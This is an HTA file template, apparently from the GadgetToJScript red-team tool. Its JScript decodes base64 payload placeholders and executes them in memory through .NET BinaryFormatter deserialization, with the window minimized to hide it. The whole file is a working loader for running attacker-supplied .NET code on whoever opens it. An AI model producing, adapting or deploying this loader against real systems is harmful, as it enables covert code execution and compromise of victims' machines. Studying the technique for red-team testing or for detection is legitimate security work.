<html> 
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<HTA:APPLICATION ID="test" WINDOWSTATE="minimize">
<head> 

    <title>GadgetToJscript HTA</title>
    <meta charset="utf-8">
    <meta http-equiv="x-ua-compatible" content="ie=9">
    
    <script language="javascript">
      		function b64ToStream(b,l) {
				var enc = new ActiveXObject("System.Text.ASCIIEncoding");
				var length = enc.GetByteCount_2(b);
				var ba = enc.GetBytes_4(b);
				var transform = new ActiveXObject("System.Security.Cryptography.FromBase64Transform");
				ba = transform.TransformFinalBlock(ba, 0, length);
				var ms = new ActiveXObject("System.IO.MemoryStream");
				ms.Write(ba, 0, l);
				ms.Position = 0;
				return ms;
			}

			var stage_1 = "%_STAGE1_%";
			var stage_2 = "%_STAGE2_%";

			try {

				var shell = new ActiveXObject('WScript.Shell');
				ver = 'v4.0.30319';

				try {
					shell.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\');
				} catch(e) { 
					ver = 'v2.0.50727';
				}

				shell.Environment('Process')('COMPLUS_Version') = ver;

				var ms_1 = b64ToStream(stage_1, %_STAGE1Len_%);
				var fmt_1 = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
				fmt_1.Deserialize_2(ms_1);
	
			} catch (e) {
				try{		
					var ms_2 = b64ToStream(stage_2, %_STAGE2Len_%);
					var fmt_2 = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
					fmt_2.Deserialize_2(ms_2);

				}catch (e2){}
			}
    </script>
</head> 

</html> 